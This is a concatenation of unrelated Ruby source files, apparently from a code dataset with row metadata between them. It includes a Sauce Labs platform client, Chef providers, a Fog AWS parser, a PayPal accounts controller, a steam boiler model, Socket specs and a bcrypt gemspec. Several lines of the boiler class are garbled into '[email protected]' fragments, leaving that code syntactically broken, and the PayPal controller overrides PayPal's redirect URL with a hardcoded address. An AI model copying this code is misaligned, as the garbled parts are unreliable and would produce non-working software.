if browser[:version].is_a?(Numeric) && browser[:version] < 0
versions_by_os[browser_os].select { |v| v =~ /^\d/ }.first(browser[:version].abs.to_i)
elsif browser[:version].present?
Array(browser[:version]).map(&:to_s)
else
versions_by_os[browser_os].first(1)
end
versions.map do |version|
# Match the requested OS name case-insensitively against known OSes.
os = platforms.keys.detect { |os| os =~ Regexp.new(browser_os, Regexp::IGNORECASE) }
platform = platforms[os][:api][version].first
{ platform: platform[0], browserName: platform[1], version: platform[2] }
end
end
else
all_versions = versions_by_os.values.flatten.uniq
versions =
if browser[:version].is_a?(Numeric) && browser[:version] < 0
all_versions.select { |v| v =~ /^\d/ }.first(browser[:version].abs.to_i)
elsif browser[:version].present?
Array(browser[:version]).map(&:to_s)
else
all_versions.first(1)
end
versions.map do |version|
# Pick the first OS that offers this version at all.
os = platforms.detect { |os, details| details[:api][version].any? }.first
platform = platforms[os][:api][version].first
{ platform: platform[0], browserName: platform[1], version: platform[2] }
end
end
end
# Merges the per-OS platform tables of every Sauce Labs browser whose long
# name matches browser[:name]; :versions and per-version :api entries are
# concatenated and de-duplicated across matching browsers.
def available_platforms_for_browser(browser)
{}.tap do |platforms|
find_browser_long_names(browser[:name]).each do |long_name|
available_platforms_by_browser[long_name].each do |os, details|
if platforms[os]
platforms[os][:versions] = (platforms[os][:versions] + details[:versions]).compact.uniq
details[:api].each do |key, values|
if platforms[os][:api][key]
platforms[os][:api][key] = (platforms[os][:api][key] + values).compact.uniq
else
platforms[os][:api][key] = values
end
end
else
platforms[os] = details
end
end
end
end
end
# Builds (and memoizes) a nested lookup of the raw Sauce Labs platform list:
# long browser name -> OS family -> { :versions => [newest..oldest],
# :api => { version => [[os, api_name, short_version], ...] } }.
def available_platforms_by_browser
@available_platforms_by_browser ||= {}.tap do |by_browser|
# Group by device+api_name so e.g. mobile devices stay distinct.
available_platforms.group_by { |p| [ p[:device], p[:api_name] ].compact.join(":") }.each do |api_name, platforms|
long_name = platforms.first[:long_name]
by_browser[long_name] = {}
# OS family = first word of the :os field (e.g. "Windows", "Mac").
platforms.group_by { |p| p[:os].split(" ").first }.each do |os, platforms|
by_browser[long_name][os] = {}
by_browser[long_name][os][:versions] = []
by_browser[long_name][os][:api] = {}
versions = platforms.map { |p| p[:short_version] }.uniq.sort_by(&:to_f).reverse
versions.each do |version|
by_browser[long_name][os][:versions] << version
by_browser[long_name][os][:api][version] = platforms.map do |platform|
if platform[:short_version] == version
platform.values_at(:os, :api_name, :short_version)
end
end.compact
end
end
end
end
end
private
# Memoized Faraday connection authenticated with the Sauce Labs account
# credentials (HTTP basic auth embedded in the URL).
#
# Fix: the memoization instance variable was misspelled "@connnection" in the
# original. The typo was functionally harmless (it was only referenced here),
# but misleading to readers and to anyone inspecting the object's ivars.
def connection
  @connection ||= Faraday.new("https://#{username}:#{access_key}@saucelabs.com/") do |faraday|
    faraday.adapter Faraday.default_adapter
    faraday.request :url_encoded
    faraday.response :logger if debug?
  end
end
# Returns the long browser names whose text matches +name+,
# case-insensitively.
def find_browser_long_names(name)
  pattern = Regexp.new(name, Regexp::IGNORECASE)
  available_platforms_by_browser.keys.select { |long_name| pattern =~ long_name }
end
# Fetches (and memoizes) the raw webdriver platform catalogue from the Sauce
# Labs info endpoint, with hash keys symbolized.
def available_platforms
@available_platforms ||= JSON.parse(connection.get("/rest/v1/info/platforms/webdriver").body).map(&:symbolize_keys)
end
end
| 30.853933 | 121 | 0.599417 |
e2144132401f97e0a5e9455c21e9aaf1b74c6f9b | 2,902 | # Cookbook Name: pris
# Provider: mapper
#
# Copyright (c) 2015 ConvergeOne Holdings Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Chef LWRP provider for a PRIS requisition "mapper".
# Why-run is supported: the converge_by blocks below describe each change so
# Chef can report it without applying it.
def whyrun_supported?
true
end
use_inline_resources
# :create — add the mapper, or re-apply it when its parameters have drifted.
action :create do
if @current_resource.exists
Chef::Log.info "#{@new_resource} already exists - checking for changes."
if @current_resource.changed
Chef::Log.info "#{@new_resource} has changed - updating."
converge_by("Update #{@new_resource}") do
add_mapper # same as adding
new_resource.updated_by_last_action(true)
end
else
Chef::Log.info "#{@new_resource} has not changed - nothing to do."
end
else
Chef::Log.info "#{@new_resource} does not exist - creating."
converge_by("Create #{@new_resource}") do
add_mapper
new_resource.updated_by_last_action(true)
end
end
end
# :delete — remove the mapper when present; no-op otherwise.
action :delete do
if @current_resource.exists
Chef::Log.info "#{@new_resource} exists - deleting."
converge_by("Delete #{@new_resource}") do
delete_mapper
new_resource.updated_by_last_action(true)
end
else
Chef::Log.info "#{@new_resource} does not exist - nothing to do."
end
end
# :create_if_missing — create only when absent; never touch an existing one.
action :create_if_missing do
if @current_resource.exists
Chef::Log.info "#{@new_resource} already exists - nothing to do."
else
converge_by("Create #{@new_resource}") do
add_mapper
new_resource.updated_by_last_action(true)
end
end
end
# PRIS API handle for the current node.
def pris
Opennms::Pris.new(node)
end
# Populates @current_resource with the observed state: whether the
# requisition and the mapper exist, and whether the mapper's parameters
# differ from the desired ones.
def load_current_resource
@current_resource = Chef::Resource::PrisMapper.new(@new_resource.name)
@current_resource.requisition_name(@new_resource.requisition_name)
@current_resource.type(@new_resource.type)
@current_resource.params(@new_resource.params)
if pris.requisition_exists?(@current_resource.requisition_name)
@current_resource.requisition_exists = true
if pris.mapper_exists?(@current_resource.type, @current_resource.requisition_name)
@current_resource.exists = true
if pris.mapper_changed?(@current_resource.requisition_name, @current_resource.type, @current_resource.params)
@current_resource.changed = true
end
end
end
end
private
def add_mapper
pris.add_requisition_mapper(new_resource.requisition_name, new_resource.type, new_resource.params)
end
# NOTE(review): add passes (name, type, params) but delete passes
# (name, params). Confirm against Opennms::Pris that
# delete_requisition_mapper really takes params — not type — as its second
# argument.
def delete_mapper
pris.delete_requisition_mapper(new_resource.requisition_name, new_resource.params)
end
| 29.313131 | 115 | 0.740179 |
1845acaa1c5b086a1e99391e6865b2a6d2c096b6 | 1,022 | module Fog
module Parsers
module Compute
module AWS
# SAX-style parser for EC2 DescribeReservedInstances responses: accumulates
# one reserved instance per <item> element into @response.
class DescribeReservedInstances < Fog::Parsers::Base
  # Tags copied into the current reserved instance unchanged.
  STRING_FIELDS = %w[availabilityZone instanceType productDescription reservedInstancesId state offeringType].freeze
  # Tags coerced to Integer / Float respectively.
  INTEGER_FIELDS = %w[duration instanceCount].freeze
  FLOAT_FIELDS = %w[fixedPrice amount].freeze

  def reset
    @reserved_instance = {}
    @response = { 'reservedInstancesSet' => [] }
  end

  def end_element(name)
    if STRING_FIELDS.include?(name)
      @reserved_instance[name] = value
    elsif INTEGER_FIELDS.include?(name)
      @reserved_instance[name] = value.to_i
    elsif FLOAT_FIELDS.include?(name)
      @reserved_instance[name] = value.to_f
    elsif name == 'item'
      # An </item> closes one reserved instance; start collecting the next.
      @response['reservedInstancesSet'] << @reserved_instance
      @reserved_instance = {}
    elsif name == 'requestId'
      @response[name] = value
    elsif name == 'start'
      @reserved_instance[name] = Time.parse(value)
    end
  end
end
end
end
end
end
| 27.621622 | 121 | 0.540117 |
9161e7f7b3d2603259a1758cecfb227e70a47da2 | 147 | module FormtasticAutoSelect2
# Namespace for code that extends ("infects") third-party libraries.
module Infectors
# Formtastic integration; :Inputs is resolved lazily via ActiveSupport's
# autoload machinery — presumably from
# formtastic_auto_select2/infectors/formtastic/inputs (confirm file layout).
module Formtastic
extend ActiveSupport::Autoload
autoload :Inputs
end
end
end | 18.375 | 36 | 0.734694 |
6aecfbd34bdeea66757e92de558b7845638d62d6 | 10,237 | class PaypalAccountsController < ApplicationController
# Inject the PayPal API clients; these provide the paypal_permissions and
# paypal_merchant helpers used throughout this controller.
include PaypalService::PermissionsInjector
include PaypalService::MerchantInjector
# Every action requires a signed-in user ...
before_filter do |controller|
controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_view_your_settings")
end
# ... and PayPal being enabled for the community (see private filter below).
before_filter :ensure_paypal_enabled
# Short-hand aliases for the PaypalService entry points used in the actions.
PaypalAccountForm = FormUtils.define_form("PaypalAccountForm")
PaypalAccountEntity = PaypalService::PaypalAccount::Entity
PaypalAccountQuery = PaypalService::PaypalAccount::Query
PaypalAccountCommand = PaypalService::PaypalAccount::Command
DataTypePermissions = PaypalService::DataTypes::Permissions
# GET: shows the user's connected PayPal account. Redirects to :new until the
# account has been fully prepared (permissions + billing agreement).
def show
paypal_account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
return redirect_to action: :new unless PaypalAccountEntity.paypal_account_prepared?(paypal_account)
@selected_left_navi_link = "payments"
commission_from_seller = @current_community.commission_from_seller ? @current_community.commission_from_seller : 0
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
# Warn when the marketplace admin has not connected their own account yet.
flash.now[:error] = t("paypal_accounts.new.admin_account_not_connected") unless community_ready_for_payments
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
paypal_account: paypal_account,
paypal_account_email: Maybe(paypal_account)[:email].or_else(""),
commission_from_seller: t("paypal_accounts.commission", commission: commission_from_seller)
})
end
# GET: renders the "connect your PayPal account" form. Redirects to :show
# when the account is already fully prepared.
def new
paypal_account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
return redirect_to action: :show if PaypalAccountEntity.paypal_account_prepared?(paypal_account)
@selected_left_navi_link = "payments"
commission_from_seller = @current_community.commission_from_seller ? @current_community.commission_from_seller : 0
community_currency = @current_community.default_currency
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
flash.now[:error] = t("paypal_accounts.new.admin_account_not_connected") unless community_ready_for_payments
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
form_action: person_paypal_account_path(@current_user),
paypal_account_form: PaypalAccountForm.new,
paypal_account_state: Maybe(paypal_account)[:order_permission_state].or_else(""),
paypal_account_email: Maybe(paypal_account)[:email].or_else(""),
commission_from_seller: t("paypal_accounts.commission", commission: commission_from_seller),
minimum_commission: minimum_commission,
currency: community_currency
})
end
# POST: entry point of the PayPal onboarding flow. First visit starts the
# order-permission request; once permissions are verified, the follow-up
# visit starts the billing-agreement step.
def create
  unless PaypalHelper.community_ready_for_payments?(@current_community)
    return redirect_to action: :new
  end
  account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
  if PaypalAccountEntity.order_permission_verified?(account)
    create_billing_agreement
  else
    create_paypal_account
  end
end
# PayPal return URL for the permissions flow: exchanges the request token and
# verification code for an access token, pulls the account's email/payer id,
# and confirms the pending permissions request.
def permissions_verified
unless params[:verification_code].present?
return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.permissions_not_granted"))
end
access_token_res = fetch_access_token(params[:request_token], params[:verification_code])
return flash_error_and_redirect_to_settings(error_response: access_token_res) unless access_token_res[:success]
personal_data_res = fetch_personal_data(access_token_res[:token], access_token_res[:token_secret])
return flash_error_and_redirect_to_settings(error_response: personal_data_res) unless personal_data_res[:success]
PaypalAccountCommand.update_personal_account(
@current_user.id,
@current_community.id,
{
email: personal_data_res[:email],
payer_id: personal_data_res[:payer_id]
}
)
PaypalAccountCommand.confirm_pending_permissions_request(
@current_user.id,
@current_community.id,
params[:request_token],
access_token_res[:scope].join(","),
params[:verification_code]
)
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
# PayPal return URL after the user approves the billing agreement: affirms
# the agreement, verifies the approval belongs to the connected account, and
# confirms the pending agreement record.
def billing_agreement_success
  affirm_agreement_res = affirm_billing_agreement(params[:token])
  return flash_error_and_redirect_to_settings(error_response: affirm_agreement_res) unless affirm_agreement_res[:success]
  billing_agreement_id = affirm_agreement_res[:billing_agreement_id]
  express_checkout_details_req = PaypalService::DataTypes::Merchant.create_get_express_checkout_details({token: params[:token]})
  express_checkout_details_res = paypal_merchant.do_request(express_checkout_details_req)
  paypal_account = PaypalAccountQuery.personal_account(@current_user.id, @current_community.id)
  if !express_checkout_details_res[:billing_agreement_accepted]
    return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_not_accepted"))
  elsif express_checkout_details_res[:payer_id] != paypal_account[:payer_id]
    return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_wrong_account"))
  end
  # Fix: the original captured this call's result into an unused local
  # (`success = ...`) and never checked it. The dead assignment is removed;
  # NOTE(review): the result is still not acted upon — confirm whether a
  # failure here should surface an error to the user.
  PaypalAccountCommand.confirm_billing_agreement(@current_user.id, @current_community.id, params[:token], billing_agreement_id)
  redirect_to show_paypal_account_settings_payment_path(@current_user.username)
end
# PayPal cancel URL: the user backed out of the billing-agreement flow, so
# drop the pending agreement and send them back to the connect form.
def billing_agreement_cancel
  token = params[:token]
  PaypalAccountCommand.cancel_pending_billing_agreement(@current_user.id, @current_community.id, token)
  flash[:error] = t("paypal_accounts.new.billing_agreement_canceled")
  redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
private
# Step 1 of onboarding: creates the local pending account record and sends
# the user to PayPal's permission-grant page.
def create_paypal_account
PaypalAccountCommand.create_personal_account(
@current_user.id,
@current_community.id
)
permissions_url = request_paypal_permissions_url
if permissions_url.blank?
flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
return redirect_to action: :new
else
return redirect_to permissions_url
end
end
# Step 2 of onboarding: sends the user to PayPal's billing-agreement page,
# or back to the form with an error when no redirect URL could be obtained.
def create_billing_agreement
  url = request_paypal_billing_agreement_url
  return redirect_to url if url.present?
  flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
  redirect_to action: :new
end
# Before filter: bounce to the settings page when the community has not
# enabled PayPal payments at all.
def ensure_paypal_enabled
  return if @current_community.paypal_enabled?
  flash[:error] = t("paypal_accounts.new.paypal_not_enabled")
  redirect_to person_settings_path(@current_user)
end
# Requests an order-permissions grant from PayPal; on success records the
# pending request locally and returns the PayPal redirect URL, otherwise nil.
def request_paypal_permissions_url
permission_request = PaypalService::DataTypes::Permissions
.create_req_perm({callback: permissions_verified_person_paypal_account_url })
response = paypal_permissions.do_request(permission_request)
if response[:success]
PaypalAccountCommand.create_pending_permissions_request(
@current_user.id,
@current_community.id,
response[:username_to],
permission_request[:scope],
response[:request_token]
)
response[:redirect_url]
else
nil
end
end
# Sets up a PayPal billing agreement; on success records the pending
# agreement locally and returns the URL to redirect the user to, otherwise
# nil.
#
# Fixes: removed two stray debugging `puts` lines that wrote to stdout, and
# an unused local (`commission_from_seller`) that was computed and never read.
def request_paypal_billing_agreement_url
  billing_agreement_request = PaypalService::DataTypes::Merchant
    .create_setup_billing_agreement({
      description: t("paypal_accounts.new.billing_agreement_description"),
      success: billing_agreement_success_person_paypal_account_url,
      cancel: billing_agreement_cancel_person_paypal_account_url
    })
  response = paypal_merchant.do_request(billing_agreement_request)
  if response[:success]
    PaypalAccountCommand.create_pending_billing_agreement(
      @current_user.id,
      @current_community.id,
      response[:username_to],
      response[:token]
    )
    # NOTE(review): the original overwrote PayPal's redirect URL with this
    # hard-coded application URL; kept to preserve behavior, but confirm
    # whether the user should instead be sent to the URL PayPal returned in
    # response[:redirect_url].
    response[:redirect_url] = "https://pg-platform.herokuapp.com/"
  else
    nil
  end
end
# Turns an approved express-checkout token into an actual billing agreement
# via the PayPal merchant API.
def affirm_billing_agreement(token)
  req = PaypalService::DataTypes::Merchant.create_create_billing_agreement({token: token})
  paypal_merchant.do_request(req)
end
# Exchanges the permissions request token + verification code for a PayPal
# access token.
#
# Fixes: the original ignored both of its parameters and read
# params[:request_token] / params[:verification_code] from the controller
# directly (behavior-identical for the current caller, which passes those
# same values, but a latent bug for any other caller), and ended with a
# redundant trailing assignment to an unused local.
def fetch_access_token(request_token, verification_code)
  access_token_req = DataTypePermissions.create_get_access_token(
    {
      request_token: request_token,
      verification_code: verification_code
    }
  )
  paypal_permissions.do_request(access_token_req)
end
# Fetches the PayPal account's basic personal data (email, payer id) with the
# given access token pair.
def fetch_personal_data(token, token_secret)
  req = DataTypePermissions.create_get_basic_personal_data(
    { token: token, token_secret: token_secret }
  )
  paypal_permissions.do_request(req)
end
# Flashes an error and sends the user back to the payment-settings form.
# Accepts either an explicit error_msg or a PayPal error_response, from which
# a user-facing message is derived.
def flash_error_and_redirect_to_settings(error_response: nil, error_msg: nil)
error_msg =
if (error_msg)
error_msg
# PayPal error code 570058 — presumably "account not verified"; confirm
# against PayPal's Permissions API error-code table.
elsif (error_response && error_response[:error_code] == "570058")
t("paypal_accounts.new.account_not_verified")
else
t("paypal_accounts.new.something_went_wrong")
end
flash[:error] = error_msg
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
# Minimum commission for the community's payment gateway: the PayPal minimum
# for :paypal communities, otherwise zero in the community currency.
def minimum_commission
payment_type = MarketplaceService::Community::Query.payment_type(@current_community.id)
currency = @current_community.default_currency
case payment_type
when :paypal
paypal_minimum_commissions_api.get(currency)
else
Money.new(0, currency)
end
end
# Accessor for the PaypalService minimum-commissions API singleton.
def paypal_minimum_commissions_api
PaypalService::API::Api.minimum_commissions_api
end
end
| 37.498168 | 139 | 0.77298 |
38feb7b37474804c42e80631426005c7549ec486 | 2,558 | # encoding: utf-8
module Pulo
module Steam
# Steady-state steam-boiler mass/energy balance.
#
# Given the feedwater pressure, blowdown fraction, combustion efficiency and
# steam pressure, plus EITHER a target steam temperature OR the fuel power,
# and EITHER the steam OR the feedwater mass flow, it derives the remaining
# steam / feedwater / blowdown states via the WaterSteam property model.
#
# NOTE(review): several expressions below (and some commented-out lines)
# contain literal "[email protected]" fragments — the original code appears to have
# been mangled by an email-obfuscation step when this file was exported
# (e.g. the @boiler_power assignments). They are preserved verbatim here and
# MUST be restored from the upstream source before this class can run.
class Boiler
attr_reader :feedwater, :steam, :blowdown
attr_reader :blowdown_rate, :combustion_efficiency
attr_reader :boiler_power, :fuel_power
def initialize(feedwater_pressure: nil,blowdown_rate: nil,combustion_efficiency:nil,steam_pressure: nil,
steam_temperature: nil,fuel_power: nil,
steam_massflow: nil,feedwater_massflow: nil)
raise "Need all parameters" unless
feedwater_pressure && blowdown_rate &&
combustion_efficiency && steam_pressure &&
(steam_temperature || fuel_power) &&
(steam_massflow || feedwater_massflow)
#steam_massflow=steam_massflow
@blowdown_rate=blowdown_rate
@combustion_efficiency=combustion_efficiency
@steam_temperature=steam_temperature
@feedwater_pressure=feedwater_pressure
@steam_pressure=steam_pressure
@fuel_power=fuel_power
#feedwater_massflow=feedwater_massflow
# Blowdown is saturated liquid (quality 0) at steam pressure.
@blowdown=WaterSteam.new(pressure: @steam_pressure, quality: Dimensionless.new(0))
# Derive whichever of the two mass flows was not given, using the
# blowdown fraction: steam = feedwater * (1 - blowdown_rate).
if steam_massflow
feedwater_massflow=steam_massflow/(1-@blowdown_rate)
else
steam_massflow=feedwater_massflow*(1-@blowdown_rate)
end
@blowdown.mass_flow=feedwater_massflow*@blowdown_rate
#@[email protected]_enthalpy*@blowdown_massflow
# Feedwater modeled as saturated liquid at feedwater pressure.
@feedwater=WaterSteam.new(pressure: @feedwater_pressure, quality: Dimensionless.new(0))
@feedwater.mass_flow=feedwater_massflow
#@[email protected]_enthalpy*@feedwater_massflow
if @steam_temperature
# Steam state fixed by (pressure, temperature); fuel power follows from
# the energy balance and the combustion efficiency.
@steam=WaterSteam.new(pressure: @steam_pressure, temperature: @steam_temperature)
@steam.mass_flow=steam_massflow
#@[email protected]_enthalpy*@steam_massflow
@[email protected]_flow + @blowdown.energy_flow - @feedwater.energy_flow
@fuel_power=@boiler_power/@combustion_efficiency
else
# Fuel power given: derive the steam enthalpy from the energy balance
# and reject states that are still liquid (IF97 region 1).
@boiler_power=@fuel_power*@combustion_efficiency
steam_power=@[email protected][email protected]_flow
specific_enthalpy=steam_power/steam_massflow
@steam=WaterSteam.new(pressure: @steam_pressure, specific_enthalpy: specific_enthalpy)
@steam.mass_flow=steam_massflow
raise "Boiler not boiling!" if @steam.if97_region=="1"
end
end
end
end
end | 41.934426 | 111 | 0.685301 |
0821aecc8f639f884606614f13125be2f00712ba | 995 | SparkleFormation.dynamic(:files_tower_callback) do | id, config = {} |
# Writes /usr/local/bin/tower-callback: a bash script that phones home to an
# Ansible Tower job-template callback endpoint. Usage:
#   tower-callback <tower-host> <host-config-key> <job-template-id>
# Retries up to 10 times, one minute apart, until Tower answers 202 Accepted.
set!('/usr/local/bin/tower-callback') do
content join!([
"#!/bin/bash\n",
"retry_attempts=10\n",
"attempt=0\n",
"while [[ $attempt -lt $retry_attempts ]]\n",
"do\n",
" status_code=`curl -s -i --data \"host_config_key=$2\" https://$1/api/v1/job_templates/$3/callback/ | head -n 1 | awk '{print $2}'`\n",
" if [[ $status_code == 202 ]]\n",
" then\n",
" exit 0\n",
" fi\n",
" attempt=$(( attempt + 1 ))\n",
" echo \"${status_code} received... retrying in 1 minute. (Attempt ${attempt})\"\n",
" sleep 60\n",
"done\n",
"exit 1\n",
])
# World-executable script.
mode "000755"
end
end | 41.458333 | 159 | 0.38392 |
91950d8e2ba7c7afeb17e62d938e469076498e3f | 223 |
# Migration: creates the artists table with basic profile columns.
class CreateArtists < ActiveRecord::Migration[4.2]
  def change
    create_table :artists do |table|
      table.string  :name
      table.string  :genre
      table.integer :age
      table.string  :hometown
    end
  end
end
6a03a8ecd02591ca1164e75429cd5fc6d9dbcba9 | 7,560 | require 'socket'
# mspec/rubyspec-style specification of Socket.getaddrinfo.
# NOTE(review): `Fixnum` assertions date this spec to pre-2.4 Ruby (Fixnum
# was unified into Integer in 2.4); `mock`/`stub!` are mspec helpers.
describe 'Socket.getaddrinfo' do
# These examples rely on BasicSocket.do_not_reverse_lookup being true (the
# default), so address and canonical name come back identical.
describe 'without global reverse lookups' do
it 'returns an Array' do
Socket.getaddrinfo(nil, 'http').should be_an_instance_of(Array)
end
it 'accepts a Fixnum as the address family' do
array = Socket.getaddrinfo(nil, 'http', Socket::AF_INET)[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Fixnum as the address family using IPv6' do
array = Socket.getaddrinfo(nil, 'http', Socket::AF_INET6)[0]
array[0].should == 'AF_INET6'
array[1].should == 80
array[2].should == '::1'
array[3].should == '::1'
array[4].should == Socket::AF_INET6
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Symbol as the address family' do
array = Socket.getaddrinfo(nil, 'http', :INET)[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Symbol as the address family using IPv6' do
array = Socket.getaddrinfo(nil, 'http', :INET6)[0]
array[0].should == 'AF_INET6'
array[1].should == 80
array[2].should == '::1'
array[3].should == '::1'
array[4].should == Socket::AF_INET6
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a String as the address family' do
array = Socket.getaddrinfo(nil, 'http', 'INET')[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a String as the address family using IPv6' do
array = Socket.getaddrinfo(nil, 'http', 'INET6')[0]
array[0].should == 'AF_INET6'
array[1].should == 80
array[2].should == '::1'
array[3].should == '::1'
array[4].should == Socket::AF_INET6
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
# Duck-typing: any argument responding to #to_str is coerced to a String.
it 'accepts an object responding to #to_str as the host' do
dummy = mock(:dummy)
dummy.stub!(:to_str).and_return('127.0.0.1')
array = Socket.getaddrinfo(dummy, 'http')[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts an object responding to #to_str as the address family' do
dummy = mock(:dummy)
dummy.stub!(:to_str).and_return('INET')
array = Socket.getaddrinfo(nil, 'http', dummy)[0]
array[0].should == 'AF_INET'
array[1].should == 80
array[2].should == '127.0.0.1'
array[3].should == '127.0.0.1'
array[4].should == Socket::AF_INET
array[5].should be_an_instance_of(Fixnum)
array[6].should be_an_instance_of(Fixnum)
end
it 'accepts a Fixnum as the socket type' do
Socket.getaddrinfo(nil, 'http', :INET, Socket::SOCK_STREAM)[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts a Symbol as the socket type' do
Socket.getaddrinfo(nil, 'http', :INET, :STREAM)[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts a String as the socket type' do
Socket.getaddrinfo(nil, 'http', :INET, 'STREAM')[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts an object responding to #to_str as the socket type' do
dummy = mock(:dummy)
dummy.stub!(:to_str).and_return('STREAM')
Socket.getaddrinfo(nil, 'http', :INET, dummy)[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'accepts a Fixnum as the protocol family' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :DGRAM, Socket::IPPROTO_UDP)
addr[0].should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_DGRAM,
Socket::IPPROTO_UDP
]
end
# AI_PASSIVE with a nil host yields the wildcard address 0.0.0.0.
it 'accepts a Fixnum as the flags' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, Socket::AI_PASSIVE)
addr[0].should == [
'AF_INET',
80,
'0.0.0.0',
'0.0.0.0',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
it 'performs a reverse lookup when the reverse_lookup argument is true' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, 0, true)[0]
addr[0].should == 'AF_INET'
addr[1].should == 80
addr[2].should be_an_instance_of(String)
addr[2].should_not == addr[3]
addr[3].should == '127.0.0.1'
end
it 'performs a reverse lookup when the reverse_lookup argument is :hostname' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, 0, :hostname)[0]
addr[0].should == 'AF_INET'
addr[1].should == 80
addr[2].should be_an_instance_of(String)
addr[2].should_not == addr[3]
addr[3].should == '127.0.0.1'
end
it 'performs a reverse lookup when the reverse_lookup argument is :numeric' do
addr = Socket.getaddrinfo(nil, 'http', :INET, :STREAM,
Socket::IPPROTO_TCP, 0, :numeric)[0]
addr.should == [
'AF_INET',
80,
'127.0.0.1',
'127.0.0.1',
Socket::AF_INET,
Socket::SOCK_STREAM,
Socket::IPPROTO_TCP
]
end
end
# Flips the process-wide reverse-lookup switch, restoring it afterwards so
# other specs are unaffected.
describe 'with global reverse lookups' do
before do
@do_not_reverse_lookup = BasicSocket.do_not_reverse_lookup
BasicSocket.do_not_reverse_lookup = false
end
after do
BasicSocket.do_not_reverse_lookup = @do_not_reverse_lookup
end
it 'returns an address honoring the global lookup option' do
addr = Socket.getaddrinfo(nil, 'http', :INET)[0]
addr[0].should == 'AF_INET'
addr[1].should == 80
# We don't have control over this value and there's no way to test this
# without relying on Socket.getaddrinfo()'s own behaviour (meaning this
# test would fail anyway if the method was not implemented correctly).
addr[2].should be_an_instance_of(String)
addr[2].should_not == addr[3]
addr[3].should == '127.0.0.1'
end
end
end
| 28.745247 | 83 | 0.584921 |
abb01f1f606274c44392ba80fa3ca6c0cb291f1d | 1,832 | # -*- encoding: utf-8 -*-
# Gemspec for bcrypt 3.1.10. The version-conditional dependency branches
# below are characteristic of tool-generated gemspecs (e.g. `gem build` /
# vendoring output) — edit with care, or regenerate instead.
# NOTE(review): the author email reads literally "[email protected]"; the real
# address was presumably redacted by an obfuscation step during export.
Gem::Specification.new do |s|
s.name = "bcrypt"
s.version = "3.1.10"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Coda Hale"]
s.date = "2015-01-29"
s.description = " bcrypt() is a sophisticated and secure hash algorithm designed by The OpenBSD project\n for hashing passwords. The bcrypt Ruby gem provides a simple wrapper for safely handling\n passwords.\n"
s.email = "[email protected]"
s.extensions = ["ext/mri/extconf.rb"]
s.extra_rdoc_files = ["README.md", "COPYING", "CHANGELOG", "lib/bcrypt/engine.rb", "lib/bcrypt/error.rb", "lib/bcrypt/password.rb", "lib/bcrypt.rb"]
